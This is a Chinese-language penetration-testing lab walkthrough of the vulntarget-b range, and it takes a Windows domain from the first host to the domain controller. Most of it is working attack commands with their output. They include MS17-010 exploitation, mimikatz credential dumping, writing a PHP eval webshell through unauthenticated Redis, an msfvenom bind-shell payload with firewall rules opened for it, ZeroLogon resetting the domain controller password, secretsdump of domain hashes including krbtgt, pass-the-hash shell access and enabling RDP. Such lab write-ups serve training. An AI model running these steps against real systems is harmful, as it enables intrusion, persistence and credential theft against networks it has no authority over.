✎ 閱讀須知
烏鴉安全的技術文章僅供參考,此文所提供的資訊隻為網絡安全人員對自己所負責的網站、伺服器等(包括但不限于)進行檢測或維護參考,未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的資訊而造成的直接或間接後果和損失,均由使用者本人負責。
烏鴉安全擁有對此文章的修改、删除和解釋權限,如轉載或傳播此文章,需保證文章的完整性,未經允許,禁止轉載!
本文所提供的工具僅用于學習,禁止用于其他,請在24小時内删除工具檔案!!!
本文作者:夏天 本文已獲得作者授權
vuntarget免責聲明
vulntarget靶場系列僅供安全專業人員練習滲透測試技術,此靶場所提供的資訊隻為網絡安全人員對自己所負責的網站、伺服器等(包括但不限于)進行檢測或維護參考,未經授權請勿利用靶場中的技術資料對任何計算機系統進行入侵操作。利用此靶場所提供的資訊而造成的直接或間接後果和損失,均由使用者本人負責。
vulntarget靶場系列擁有對此靶場系列的的修改、删除和解釋權限,未經授權,不得用于其他。
vulntarget位址:
https://github.com/crow821/vulntarget
歡迎多多star🌟
vulntarget搭建系列
vulntarget漏洞靶場系列(一)
vulntarget漏洞靶場系列(二)— vulntarget-b
vulntarget漏洞靶場系列(三)— vulntarget-c
1. 拓撲圖
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAjM2EzLcd3LcJzLcJzdllmVldWYtl2Pn5GcuAzYjFzNycjMwQjNlZmMhZTMzUGNwQmY2M2YjJTMhFmNvwFN1UTM2ADNtUGall3LcVmdhNXLwRHdo9CXt92YucWbpRWdvx2Yx5yazF2Lc9CX6MHc0RHaiojIsJye.png)
靶場下載下傳位址
連結: https://pan.baidu.com/s/195iUmvbaKOhtn2S_O-F6TA 提取碼: jnkq
複制
入口
192.168.0.4
kali
192.168.0.35
2. 第一層
2.1 端口掃描
nmap
掃描一下開了掃描端口
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC 192.168.0.4 -p- -T4 -v
Host is up (0.00083s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
|_http-favicon: Unknown favicon MD5: 1205AF91D6B1638C23DE1132AE0C7E0B
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7-PC
| NetBIOS computer name: WIN7-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-26T09:56:17+08:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:24:f0:bb (VMware)
| Names:
| WIN7-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WIN7-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-01-26T01:56:17
|_ start_date: 2022-01-26T01:49:34
複制
開了
SMB
服務可以嘗試
ms17-010
掃描
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap --script=vuln 192.168.0.4 -p 445,135,139 -T4 -v
Host is up (0.0011s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
複制
nmap
掃到了
ms17-010
漏洞,還開了
80
端口
2.2 通達OAgetshell
http://192.168.0.4/rA4WmWb.php
密碼:x
複制
蟻劍連接配接直接
system
權限
2.3 MS17-010漏洞
掃描存在
擷取密碼
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
win7 win7-PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN7-PC$ WORKGROUP (null)
win7 win7-PC admin
tspkg credentials
=================
Username Domain Password
-------- ------ --------
win7 win7-PC admin
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
win7 win7-PC admin
win7-pc$ WORKGROUP (null)
複制
發現内網網段
10.0.20.98
自動遷移程序,添加路由
meterpreter > run post/windows/manage/migrate
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN7-PC
[*] Current server process: spoolsv.exe (1128)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3728
[+] Successfully migrated into process 3728
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
複制
3. 橫向第二台機器
掃描
10.0.20.0/24
網段
use auxiliary/scanner/portscan/tcp
set ports 22,23,80,443,8080,8081,3389,445,143,6379
set rhosts 10.0.20.0/24
set threads 20
run
複制
已知
98
是我們拿下的
win7
99
開了
80
和
6379
開啟
msf
的
socks5
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
複制
掃一下目錄
python3 dirsearch.py -u "http://10.0.20.99/" --proxy=socks5://localhost:1080
複制
得到的
web
目錄
C:\phpStudy\PHPTutorial\WWW\phpinfo.php
沒什麼可看的 測試一下
6379
,發現未授權
windows
,不出網,就寫
webshell
吧
┌──(kali㉿kali)-[~]
└─$ proxychains4 redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW/"
OK
10.0.20.99:6379> config set dbfilename xt.php
OK
10.0.20.99:6379> set 1 "<?php @eval($_POST['xt']);?>"
OK
10.0.20.99:6379> save
OK
複制
蟻劍連接配接
image.png
quser
:發現win2016使用者線上
ipconifg /all
:域名
vulntarget.com
另外一個内網
IP
10.0.10.111
tasklist
檢視程序,清除軟,存在
Windows Defender
正向上線
msf
生成shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8091 -f exe > 8091_bind.exe
複制
監聽配置
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 8091 yes The listen port
RHOST 10.0.20.99 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 10.0.20.99:8091
複制
後門運作,但遲遲沒有上線,可能就是防火牆開了
添加防火牆入站規則
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
複制
重新運作運作,恭喜上線成功
加載
kiwi
随機切換一個程序
檢視
HTLM
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > run post/windows/manage/migrate
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN2016
[*] Current server process: 8091_bind.exe (676)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 1764
[+] Successfully migrated into process 1764
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
WIN2016$ VULNTARGET aabc352125765ee443568d0cdf27d62a 0aeb385e9aa49fa7e0be911d3b17da00f2aa7acd
WIN2016$ VULNTARGET e0cd419213811fd910ca6c3c42d764e7 cd721f807e68ce07a4d0fe80b9356e93986d5ef1
win2016 VULNTARGET dfc8d2bfa540a0a6e2248a82322e654e cfa10f59337120a5ea6882b11c1c9f451f5f4ea6 27bd7cc4802079a6e008ed2d917c4323
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN2016$ VULNTARGET (null)
win2016 VULNTARGET (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN2016$ vulntarget.com NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
WIN2016$ vulntarget.com c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
win2016 VULNTARGET.COM (null)
win2016$ VULNTARGET.COM (null)
win2016$ VULNTARGET.COM c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f
27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 42 fd 87 6e 76 d4 b4 71 78 4f 27 8f 26 a9 ae 63 c2 b0 dd 5e 20 21 ad 4e 4e 1d 71 5b 1a 14 e6 6f 85 ab 45 3
8 10 3a f5 ae fb 41 9b a9 bd a5 01 c7 d2 f1 36 42 ba 98 3b 41 7a 02 79 aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31
91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5
meterpreter >
複制
win2016
的密碼
Admin#123
檢視域控制器計算機名
net group "domain controllers" /domain
WIN2019
複制
檢視域管理者
net group "enterprise admins" /domain
administrator
複制
ping
域控制器主機名稱得到
IP
位址
10.0.10.110
添加路由
4. CVE-2020-1472提權到域控
因為隻是域普通使用者,直接上
1472
漏洞
密碼置空,使用secretdump擷取域控上的hash
┌──(kali㉿kali)-[~/Desktop/CVE-2020-1472/EXP]
└─$ proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:49674 ... OK
======================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
複制
得到
administrator
域管理者的
hash
┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 secretsdump.py vulntarget.com/WIN2019\[email protected] -just-dc -no-pass 127 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:445 ... OK
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:aabc352125765ee443568d0cdf27d62a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:64e86893159e2f036ee7d9a7a8312dfa9e2ab3b1435dcad3d372cac3d3530b54
WIN2016$:aes128-cts-hmac-sha1-96:efe65cbd2f33250e1f5d0baad8fa8719
WIN2016$:des-cbc-md5:911657540e94079b
[*] Cleaning up...
複制
成功通路域控
┌──(kali㉿kali)-[~/Desktop/impacket-0.9.24/examples]
└─$ proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected] 1 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
win2019
C:\Windows\system32>
複制
破解
hash
密碼
Admin@666
秒出 !!!!
─(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=./pass.txt ./winhash.txt --format=NT 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Admin@666 (Administrator)
1g 0:00:00:00 DONE (2022-01-26 01:58) 100.0g/s 508800p/s 508800c/s 508800C/s admin333..Admin99
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
複制
開啟
3389
,防火牆放行
3389
,連接配接
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
複制
準備上線
msf
還是開了防火牆先做規則
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
複制